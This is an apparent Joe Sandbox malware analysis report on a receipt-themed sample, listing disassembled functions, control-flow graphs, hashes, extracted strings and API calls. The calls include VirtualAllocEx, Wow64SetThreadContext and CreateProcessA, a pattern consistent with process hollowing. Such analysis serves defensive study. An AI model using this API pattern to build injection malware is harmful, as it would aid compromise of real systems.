                • String ID:
                • API String ID:
                • Opcode ID: d097e40aca7e19dd5337cab85a58872a1d8ae00aa4601dfec2768dc2dde85c60
                • Instruction ID: bab3059b3b484ead9e50335d5e15dd248c7fce177190d42229416d35b531f4f2
                • Opcode Fuzzy Hash: d097e40aca7e19dd5337cab85a58872a1d8ae00aa4601dfec2768dc2dde85c60
                • Instruction Fuzzy Hash: DA125A70A013048FD758EB69D59866EB7FAFF88300B10846CE506D77A6CF79AC46CB51
                Function 06C70710 Relevance: .5, Instructions: 459COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2256d3a62e7ba8afaf2e24864aee127f1a128f6579867594c8007ee52d3911fc
                • Instruction ID: a5f0238972ab1e6c61d53ac59f13f73b5d71957e5756ba14912ace3c8510a690
                • Opcode Fuzzy Hash: 2256d3a62e7ba8afaf2e24864aee127f1a128f6579867594c8007ee52d3911fc
                • Instruction Fuzzy Hash: 7A125BB4A002058FD745DF68C584EAABBF6FF88300B15C4A9E549DB362CB34ED45CBA1
                Function 0686DF29 Relevance: .4, Instructions: 407COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9151e4fc3326bd30878334317ae08a442e4a9a5bc5b19e61aa9dcbb86ea02012
                • Instruction ID: 814a8a473dd58f357ed285273d419744443f7ccaf7afa224e3b028fcc1337613
                • Opcode Fuzzy Hash: 9151e4fc3326bd30878334317ae08a442e4a9a5bc5b19e61aa9dcbb86ea02012
                • Instruction Fuzzy Hash: F4025735A04705CFDB65CF6AC988A6EBBF2BF48300F148969E456DB761DB34E885CB40
                Function 0850885D Relevance: .4, Instructions: 402COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2bcc03b73b2ed7ac4aea8a18a83bc59738651dc92a2c8c6b18583b68e5565c5b
                • Instruction ID: 56466335ddce15fdf2e88a5b89165a3ae9cb26a7e6ad3a4bc1a4e1a726dfe6b0
                • Opcode Fuzzy Hash: 2bcc03b73b2ed7ac4aea8a18a83bc59738651dc92a2c8c6b18583b68e5565c5b
                • Instruction Fuzzy Hash: 37F1BD70A002099FCB15DF68D884B9EBBF6FF84311F148569E505EB2A2DB34ED46CB91
                Function 06882948 Relevance: .4, Instructions: 401COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9fc7c275194af78d29695c703e44072b58ad0f49f2a1fdb7f58a798dda7c19c2
                • Instruction ID: 09a9bbdca331e14c6a5e39261b1871f071429259249ff2dda42c2a16a39afeca
                • Opcode Fuzzy Hash: 9fc7c275194af78d29695c703e44072b58ad0f49f2a1fdb7f58a798dda7c19c2
                • Instruction Fuzzy Hash: 7FF17274A002099FDB44EFA8D854AADBBF6FF88304F108469D506EB365DB35ED46CB90
                Function 08501F30 Relevance: 38.2, Strings: 28, Instructions: 3213COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 230 8501f30-8501f43 231 8501f46-8501f6a 230->231 233 85020b0-85055d7 231->233 234 8501f70-8501f83 231->234 959 8505621-8505628 233->959 235 8502098-85020a2 234->235 236 8501f89-8501f8c 234->236 235->231 237 85020a8-85020af 235->237 238 8501f8f-8501fa9 236->238 238->235 242 8501faf-8501fb1 238->242 244 8501fb3-8501fc9 242->244 245 8501fcb-8501fd8 242->245 249 8501fdb-8502026 call 85012a8 244->249 245->249 260 850202d-850202f 249->260 262 8502040 260->262 263 8502031-850203e 260->263 264 8502042-8502050 262->264 263->264 268 8502052-850207d call 8501860 264->268 269 850207f 264->269 272 8502082-8502092 268->272 269->272 272->235 272->238 960 85055d9-85055f0 959->960 961 850562a-850562f 959->961 962 8505630-850566a 960->962 963 85055f2-850561e 960->963 963->959
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: $#]q$(Abq$(o]q$, ]q$,aq$,aq$0"]q$4']q$4c]q$Hb^q$LR]q$PH]q$Pp]q$X#]q$\;]q$\s]q$p ]q$p<]q$pBbq$p`]q$x bq$xaq$|b^q$|bq$bq$$]q$;]q$c]q
                • API String ID: 0-2453648194
                • Opcode ID: e09a8bda121999c8402dd00bf55215cda2a143ba94cf0a778666171001b9dbb6
                • Instruction ID: f5ccfa360769846cc564e621f8583267287432a410d187abd398b19bd8803646
                • Opcode Fuzzy Hash: e09a8bda121999c8402dd00bf55215cda2a143ba94cf0a778666171001b9dbb6
                • Instruction Fuzzy Hash: CC638D70A40318AFDB25ABA4CD44BDD7BBAFF88300F1040D9E6096B2A5DB756E84CF15
                Function 06889E68 Relevance: 3.9, Strings: 3, Instructions: 113COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1508 6889e68-6889e81 1509 6889ebb-6889ee0 1508->1509 1510 6889e83-6889e85 1508->1510 1511 6889ee7-6889f0c 1509->1511 1510->1511 1512 6889e87-6889e89 1510->1512 1515 6889f13-6889f6c 1511->1515 1514 6889e8f-6889e98 1512->1514 1512->1515 1516 6889e9a-6889ea4 1514->1516 1517 6889ea6 1514->1517 1530 6889f78-6889fb2 1515->1530 1531 6889f6e 1515->1531 1519 6889ea8-6889eab 1516->1519 1517->1519 1524 6889eb3-6889eb8 1519->1524 1531->1530
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: (aq$(aq$(aq
                • API String ID: 0-2593664646
                • Opcode ID: 315ec5446aa9def934676625b9e8f6ae3b42c019d916ef2d1da95f01bd392a39
                • Instruction ID: f585d3f24b0e1f75caceda38974f36a7dc90539c00013bbb2178640fc2f31b66
                • Opcode Fuzzy Hash: 315ec5446aa9def934676625b9e8f6ae3b42c019d916ef2d1da95f01bd392a39
                • Instruction Fuzzy Hash: 6A310332B046155FCB98AF6DD440AAFBBE6EFC53607248129E809DB389DE71DD06C391
                Function 06D1CEC0 Relevance: 3.1, APIs: 2, Instructions: 86memorythreadCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1579 6d1cec0-6d1cec5 1580 6d1cec7-6d1cf43 VirtualAllocEx 1579->1580 1581 6d1ce58-6d1ce7b Wow64SetThreadContext 1579->1581 1588 6d1cf45-6d1cf4b 1580->1588 1589 6d1cf4c-6d1cf71 1580->1589 1582 6d1ce84-6d1ceb4 1581->1582 1583 6d1ce7d-6d1ce83 1581->1583 1583->1582 1588->1589
                APIs
                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D1CE6E
                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D1CF36
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID: AllocContextThreadVirtualWow64
                • String ID:
                • API String ID: 2727713192-0
                • Opcode ID: ffa60f8513dd190d31bd5a5d9375a42936ceeeb7aaa665c933e47b2e8e97daf5
                • Instruction ID: 2574babfe6441690012243a6b0fe541175cff7cea8228696ed06cea09346ecf3
                • Opcode Fuzzy Hash: ffa60f8513dd190d31bd5a5d9375a42936ceeeb7aaa665c933e47b2e8e97daf5
                • Instruction Fuzzy Hash: F83178728002099FCB20DFAAD8457EEFFF1EF89320F24841AD559A7250C7799945CFA1
                Function 06869E50 Relevance: 3.1, Strings: 2, Instructions: 551COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1594 6869e50-6869e62 1595 6869fed-686a019 1594->1595 1596 6869e68-6869e79 call 6863ae0 1594->1596 1600 686a020-686a058 1595->1600 1596->1600 1601 6869e7f-6869ec8 call 6863ae0 call 6865678 call 68657b0 1596->1601 1605 686a05e-686a065 1600->1605 1606 686a378-686a3a4 1600->1606 1630 6869ed4-6869efb call 6860ef0 1601->1630 1631 6869eca-6869ece 1601->1631 1608 686a087-686a09c 1605->1608 1609 686a067-686a085 1605->1609 1629 686a3ab-686a3d7 1606->1629 1619 686a36e-686a375 1608->1619 1609->1608 1618 686a0a1-686a0f3 1609->1618 1633 686a0f5-686a0f8 1618->1633 1634 686a0fd-686a0ff 1618->1634 1650 686a3de-686a417 1629->1650 1652 6869f01 1630->1652 1653 6869efd-6869eff 1630->1653 1631->1630 1635 6869fd6-6869fea 1631->1635 1633->1619 1636 686a105-686a10a 1634->1636 1637 686a26e-686a27b 1634->1637 1643 686a113-686a115 1636->1643 1637->1629 1640 686a281-686a283 1637->1640 1645 686a285-686a28a 1640->1645 1646 686a292-686a298 1640->1646 1648 686a11b-686a120 1643->1648 1649 686a268-686a26c 1643->1649 1645->1646 1646->1650 1651 686a29e-686a2a6 1646->1651 1655 686a122-686a135 1648->1655 1656 686a13a-686a13f 1648->1656 1649->1637 1671 686a420-686a423 1650->1671 1672 686a419 1650->1672 1658 686a2de-686a2e2 1651->1658 1659 686a2a8-686a2ac 1651->1659 1654 6869f08-6869f1a 1652->1654 1653->1654 1674 6869f35-6869f37 1654->1674 1675 6869f1c-6869f20 1654->1675 1655->1619 1656->1637 1662 686a145-686a14d 1656->1662 1660 686a2e4-686a2e6 1658->1660 1661 686a2e8 1658->1661 1663 686a2c6-686a2d9 1659->1663 1664 686a2ae-686a2c1 1659->1664 1666 686a2ed-686a2ef 1660->1666 1661->1666 1669 686a1c5-686a1c7 1662->1669 1670 686a14f-686a151 1662->1670 1663->1619 1664->1619 1676 686a306-686a31b 1666->1676 1677 686a2f1-686a304 1666->1677 1681 686a1df-686a1e3 1669->1681 1682 686a1c9-686a1da 1669->1682 1678 686a157-686a159 1670->1678 1679 686a153-686a155 1670->1679 1689 686a425-686a428 1671->1689 1690 686a483-686a48c 1671->1690 1672->1671 1683 686a442-686a448 1672->1683 1684 686a472-686a47e 1672->1684 1685 686a4a2-686a4a8 1672->1685 1686 686a433-686a43d 1672->1686 1687 686a461-686a46d 1672->1687 1688 686a4dd-686a4e3 1672->1688 1705 6869f59-6869f5b 1674->1705 1706 6869f39-6869f40 1674->1706 1675->1674 1701 6869f22-6869f2b 1675->1701 1730 686a35c-686a369 1676->1730 1731 686a31d-686a35a 1676->1731 1677->1619 1708 686a15b-686a160 1678->1708 1709 686a168-686a16e 1678->1709 1707 686a1bd-686a1c3 1679->1707 1681->1637 1702 686a1e9-686a1eb 1681->1702 1682->1619 1695 686a450-686a45c 1683->1695 1696 686a44a 1683->1696 1694 686a502-686a50b 1684->1694 1699 686a4b0-686a4bc 1685->1699 1700 686a4aa 1685->1700 1686->1694 1687->1694 1703 686a4e5 1688->1703 1704 686a4eb-686a4f7 1688->1704 1692 686a4be-686a4c7 1689->1692 1693 686a42e-686a4ff 1689->1693 1697 686a494-686a4a0 1690->1697 1698 686a48e 1690->1698 1712 686a4cf-686a4db 1692->1712 1713 686a4c9 1692->1713 1695->1694 1696->1695 1697->1694 1698->1697 1699->1694 1700->1699 1761 6869f2d call 6869e40 1701->1761 1762 6869f2d call 6869e50 1701->1762 1715 686a25e-686a264 1702->1715 1716 686a1ed-686a1ef 1702->1716 1703->1704 1704->1694 1721 6869fcc-6869fd3 1705->1721 1722 6869f5d-6869f84 call 6860ef0 1705->1722 1717 6869f42-6869f47 1706->1717 1718 6869f49 1706->1718 1707->1669 1707->1670 1708->1709 1709->1650 1711 686a174-686a180 1709->1711 1724 686a182-686a187 1711->1724 1725 686a18f-686a195 1711->1725 1712->1694 1713->1712 1715->1702 1723 686a266 1715->1723 1727 686a1f1-686a1f6 1716->1727 1728 686a1fe-686a204 1716->1728 1729 6869f4e-6869f57 1717->1729 1718->1729 1743 6869f86-6869f88 1722->1743 1744 6869f8a-6869f91 1722->1744 1723->1637 1724->1725 1725->1650 1732 686a19b-686a1b0 1725->1732 1726 6869f33 1726->1674 1727->1728 1728->1650 1733 686a20a-686a216 1728->1733 1729->1705 1730->1619 1731->1730 1745 686a1b7-686a1b9 1732->1745 1746 686a1b2-686a1b5 1732->1746 1735 686a225-686a22b 1733->1735 1736 686a218-686a21d 1733->1736 1735->1650 1741 686a231-686a246 1735->1741 1736->1735 1741->1715 1753 686a248-686a259 1741->1753 1748 6869f93-6869fca call 6866b60 1743->1748 1744->1748 1745->1707 1749 686a1bb 1745->1749 1746->1707 1748->1721 1749->1707 1753->1619 1761->1726 1762->1726
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: 7$Haq
                • API String ID: 0-1260677198
                • Opcode ID: 141c8d210d28a712d86df8c9114aabc378a78bb1d418b92faa9b1b977d18e0a0
                • Instruction ID: 8969a6bf9eabd0ba0a374819fc6468a5f2278ca14e2437210e8ca72d47c93967
                • Opcode Fuzzy Hash: 141c8d210d28a712d86df8c9114aabc378a78bb1d418b92faa9b1b977d18e0a0
                • Instruction Fuzzy Hash: BF229F30A00205CFDB59DF69C884BAEBBB6FF89300F148469E506EB295DB75ED41CB91
                Function 0850E878 Relevance: 2.7, Strings: 2, Instructions: 249COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1763 850e878-850e8f8 1768 850ec33-850ec5d 1763->1768 1769 850e8fe-850e92d 1763->1769 1772 850ec5e 1768->1772 1776 850e942-850e96a 1769->1776 1777 850e92f-850e93a 1769->1777 1772->1772 1782 850e974-850e97e 1776->1782 1777->1776 1783 850e984-850e99b 1782->1783 1785 850e9a2-850e9a5 1783->1785 1786 850e9af-850e9ef 1785->1786 1791 850e9f5-850e9fb call 8505fd8 1786->1791 1792 850ec0e-850ec16 1786->1792 1794 850ea00-850ea10 1791->1794 1795 850ec1e-850ec2d 1792->1795 1794->1795 1798 850ea16-850ea46 1794->1798 1795->1768 1795->1769 1802 850eb53-850eb6c 1798->1802 1803 850ea4c-850ea65 1798->1803 1805 850eb77 1802->1805 1806 850eb6e 1802->1806 1809 850ea67-850ea85 1803->1809 1810 850eadf-850eaed 1803->1810 1805->1792 1806->1805 1816 850ea87-850ea8a 1809->1816 1817 850ea8c-850eaa5 1809->1817 1813 850eb01-850eb0f 1810->1813 1814 850eaef-850eaf7 1810->1814 1822 850eb21-850eb2f 1813->1822 1823 850eb11-850eb1f 1813->1823 1837 850eaf9 call 68880b0 1814->1837 1838 850eaf9 call 68880c0 1814->1838 1820 850eace-850eadd 1816->1820 1831 850eaa7-850eaac 1817->1831 1832 850eaae-850eac7 1817->1832 1818 850eaff 1821 850eb42-850eb4d 1818->1821 1820->1821 1821->1802 1821->1803 1822->1821 1829 850eb31-850eb3f 1822->1829 1823->1821 1829->1821 1831->1820 1832->1820 1836 850eac9 1832->1836 1836->1820 1837->1818 1838->1818
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: ,aq$c:
                • API String ID: 0-1952009924
                • Opcode ID: 32416926f95f77176bab180962d57da2894bac3d21e44838c7542b68de2caa79
                • Instruction ID: 733365bbd1e588c128d773a29b585bf71dc40846d3a6833d44f163752441b99e
                • Opcode Fuzzy Hash: 32416926f95f77176bab180962d57da2894bac3d21e44838c7542b68de2caa79
                • Instruction Fuzzy Hash: 35A14F34A002059FCB14DFA9C545A9EBBB6FF88701B248529D806EB3A4DF74ED46CF91
                Function 06863978 Relevance: 2.7, Strings: 2, Instructions: 214COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1839 6863978-686398c 1840 6863992-68639bd 1839->1840 1841 6863a91-6863abd 1839->1841 1846 6863ac4-6863aeb 1840->1846 1847 68639c3-68639e6 1840->1847 1841->1846 1852 6863b34-6863b39 1846->1852 1853 6863aed-6863af0 1846->1853 1847->1846 1861 68639ec-6863a6f 1847->1861 1855 6863c71-6863c74 1852->1855 1856 6863b3e-6863b43 1852->1856 1857 6863bb6-6863bbc 1853->1857 1858 6863af6-6863afc 1853->1858 1856->1855 1862 6863bbe-6863bc3 1857->1862 1863 6863bc8-6863bcd 1857->1863 1859 6863c75-6863cae 1858->1859 1860 6863b02 1858->1860 1860->1856 1860->1859 1864 6863b84-6863b89 1860->1864 1865 6863c42-6863c47 1860->1865 1866 6863c03-6863c08 1860->1866 1867 6863b8e-6863b93 1860->1867 1868 6863c0a-6863c0f 1860->1868 1869 6863b48-6863b4d 1860->1869 1870 6863c49-6863c4e 1860->1870 1871 6863b09-6863b0c 1860->1871 1872 6863c57-6863c5c 1860->1872 1873 6863b52-6863b57 1860->1873 1874 6863bd2-6863bd7 1860->1874 1875 6863c50-6863c55 1860->1875 1876 6863c11-6863c16 1860->1876 1877 6863c5e-6863c63 1860->1877 1878 6863c1f-6863c24 1860->1878 1879 6863b5c-6863b61 1860->1879 1880 6863bdc-6863be2 1860->1880 1881 6863b98-6863b9d 1860->1881 1882 6863c18-6863c1d 1860->1882 1883 6863b66-6863b6b 1860->1883 1884 6863c26-6863c2b 1860->1884 1885 6863c65-6863c6a 1860->1885 1886 6863ba2-6863ba7 1860->1886 1887 6863bac-6863bb1 1860->1887 1888 6863c2d-6863c32 1860->1888 1889 6863c34-6863c39 1860->1889 1890 6863bf5-6863bfa 1860->1890 1891 6863b70-6863b75 1860->1891 1892 6863bfc-6863c01 1860->1892 1893 6863b7a-6863b7f 1860->1893 1894 6863c3b-6863c40 1860->1894 1917 6863a75-6863a7f 1861->1917 1918 6863a71 1861->1918 1862->1855 1863->1855 1863->1874 1864->1855 1865->1855 1866->1855 1867->1855 1868->1855 1869->1855 1870->1855 1899 6863b12-6863b18 1871->1899 1900 6863c6c 1871->1900 1872->1855 1873->1855 1874->1855 1875->1855 1876->1855 1877->1855 1878->1855 1879->1855 1895 6863be4-6863be9 1880->1895 1896 6863bee-6863bf3 1880->1896 1881->1855 1882->1855 1883->1855 1884->1855 1885->1855 1886->1855 1887->1855 1888->1855 1889->1855 1890->1855 1891->1855 1892->1855 1893->1855 1894->1855 1895->1855 1896->1855 1896->1890 1901 6863b21-6863b27 1899->1901 1902 6863b1a 1899->1902 1900->1855 1901->1859 1905 6863b2d 1901->1905 1902->1859 1902->1866 1902->1868 1902->1872 1902->1875 1902->1876 1902->1877 1902->1878 1902->1882 1902->1884 1902->1885 1902->1888 1902->1889 1902->1890 1902->1892 1902->1901 1905->1856 1905->1872 1905->1875 1905->1877 1920 6863a81 call 6865b10 1917->1920 1921 6863a81 call 6865b20 1917->1921 1918->1917 1919 6863a87-6863a8e 1920->1919 1921->1919
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: Haq$U
                • API String ID: 0-1429826326
                • Opcode ID: df15edea99e6791c76b7fb9fe24808e24c266e7a6a11626e2f1bf7ab8faed83a
                • Instruction ID: e14b5bca7123edc2f098aa3950ad62b2fc634092b83c60da510904aa6d62ab5b
                • Opcode Fuzzy Hash: df15edea99e6791c76b7fb9fe24808e24c266e7a6a11626e2f1bf7ab8faed83a
                • Instruction Fuzzy Hash: FB719D38608229CFEB958A2EC46577D77B1EB40344F04956ABE47CB3A1CA38DD44E792
                Function 06C7F183 Relevance: 2.5, Strings: 2, Instructions: 15COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1963 6c7f183-6c7f18d 1965 6c7f196-6c7f198 1963->1965 1966 6c7f1b0 1965->1966 1967 6c7f19a-6c7f1a0 1965->1967 1968 6c7f1a4-6c7f1a6 1967->1968 1969 6c7f1a2 1967->1969 1968->1966 1969->1966
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: $]q$$]q
                • API String ID: 0-127220927
                • Opcode ID: f5a981595a24fc2ec7df365acf5e023ef9e53c58bac497e3ce3a95fd709b3a53
                • Instruction ID: 603904ee20dad3322d4645356de783d3fb167481663b462278ddf510c4098e20
                • Opcode Fuzzy Hash: f5a981595a24fc2ec7df365acf5e023ef9e53c58bac497e3ce3a95fd709b3a53
                • Instruction Fuzzy Hash: 01D0A72060D3458FD77A1B369D549253BB46E01820F40069FC4B5C51F3CC18CA44C376
                Function 06C724C0 Relevance: 1.8, Strings: 1, Instructions: 599COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: Hb^q
                • API String ID: 0-932020720
                • Opcode ID: 1fb8c55903117ddaf30a1cf9c3bd9df1c019d26f7724576da112e7653358ca42
                • Instruction ID: 8ab1f617c46e69ad38ab583db60ef820f96070769c3865611394119efef785f5
                • Opcode Fuzzy Hash: 1fb8c55903117ddaf30a1cf9c3bd9df1c019d26f7724576da112e7653358ca42
                • Instruction Fuzzy Hash: 36426C34A002059FCB54DF69C984EAEBBF2FF48310F558599E445AB362D734EE85CB90
                Function 08506938 Relevance: 1.8, Strings: 1, Instructions: 587COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: 3o
                • API String ID: 0-3445067109
                • Opcode ID: 75c171408607f41178e76cd528e8eccb77b42402871b6a2723951f9b00e495ec
                • Instruction ID: 412bf451ae1db8fe5f8610dcff6c8193aba0a33beeb58b46d6092aa580848143
                • Opcode Fuzzy Hash: 75c171408607f41178e76cd528e8eccb77b42402871b6a2723951f9b00e495ec
                • Instruction Fuzzy Hash: A1323378700601CFCB14DF29C588A6ABBF6FF98305B1584A9E506DB3A6DB34EC46CB51
                Function 06D1D204 Relevance: 1.8, APIs: 1, Instructions: 274processCOMMON
                Download Yara Rule
                APIs
                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D1D446
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                • Opcode ID: f5d60187fdfa2bf3750e257444394fa8a6b280b82e68a8f54fff193bd830e9da
                • Instruction ID: 6d88af1f4d38c6377dd155c0602d1d9019b0e00066f08c7085f17f860b26d004
                • Opcode Fuzzy Hash: f5d60187fdfa2bf3750e257444394fa8a6b280b82e68a8f54fff193bd830e9da
                • Instruction Fuzzy Hash: 6BB19A71D00219DFEB64CFA8D840BEDBBF2BF49314F14856AD818AB240DBB59985CF91
                Function 06D1D210 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                Download Yara Rule
                APIs
                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06D1D446
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID: CreateProcess
                • String ID:
                • API String ID: 963392458-0
                • Opcode ID: 21211d1a0bd34204a1095b39f5ca845357fa03b5b828739d3e453eed516de3b9
                • Instruction ID: e2d1a0ff629d24c5f5b63aaf28ac41bd308e53fbe67bfdbd3828d7165a14ab53
                • Opcode Fuzzy Hash: 21211d1a0bd34204a1095b39f5ca845357fa03b5b828739d3e453eed516de3b9
                • Instruction Fuzzy Hash: A1918C71D00219DFEB64CFA8D841BEDBBB2FF49304F148569E818AB240DBB59985CF91
                Function 00B6B417 Relevance: 1.7, APIs: 1, Instructions: 207COMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 00B6B67E
                Memory Dump Source
                • Source File: 00000000.00000002.2123601206.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b60000_Recaipt202431029.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 762619efc26c67e7f84cf94f15103a4286047223ac86395908b0359516435714
                • Instruction ID: 32e188581f99b7edcd0da6b9df0b1ae5277f84e327ed56892110202e6202a046
                • Opcode Fuzzy Hash: 762619efc26c67e7f84cf94f15103a4286047223ac86395908b0359516435714
                • Instruction Fuzzy Hash: 97815670A00B458FD724DF29D451B9ABBF1FF88300F00896DD48AD7A51DB39E946CB91
                Function 0850BA88 Relevance: 1.6, Strings: 1, Instructions: 372COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: Haq
                • API String ID: 0-725504367
                • Opcode ID: a42b7e6159531d5c0dd97248e72c3eb38b548b64287da82b33f7db2fd2b9af54
                • Instruction ID: 27ed70daf0c49864d66a7c5877aae01c5f65561b48a02b12f7a34cb85be146ec
                • Opcode Fuzzy Hash: a42b7e6159531d5c0dd97248e72c3eb38b548b64287da82b33f7db2fd2b9af54
                • Instruction Fuzzy Hash: 0FD1A231B002258FDB258F6C858072AFBE6BF84622F14496ED905DB396DB70CC41CBE2
                Function 00B644B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                Download Yara Rule
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 00B659C9
                Memory Dump Source
                • Source File: 00000000.00000002.2123601206.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b60000_Recaipt202431029.jbxd
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: 476dfe0f2b00112702f75dce98427c4cdf7caf0217aca938606e13ecd0967529
                • Instruction ID: d20287b7c82184e8bbb2aef0cbab74beeea7a9383656df8a7a56f4bf8d80366c
                • Opcode Fuzzy Hash: 476dfe0f2b00112702f75dce98427c4cdf7caf0217aca938606e13ecd0967529
                • Instruction Fuzzy Hash: 5341DFB0C00A1DCBDB24DFA9C984A9DBBF5BF49304F20856AD408AB255DB756946CF90
                Function 00B6590D Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                Download Yara Rule
                APIs
                • CreateActCtxA.KERNEL32(?), ref: 00B659C9
                Memory Dump Source
                • Source File: 00000000.00000002.2123601206.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b60000_Recaipt202431029.jbxd
                Similarity
                • API ID: Create
                • String ID:
                • API String ID: 2289755597-0
                • Opcode ID: ea2258d5cd41f2fab960fc6e04e9a9febd7c55968bf9c55329dafcb476611a78
                • Instruction ID: 808bbce4dba14782b216b3ce33afbd9889d63bb64be4edafa46a2e7d5ece23f6
                • Opcode Fuzzy Hash: ea2258d5cd41f2fab960fc6e04e9a9febd7c55968bf9c55329dafcb476611a78
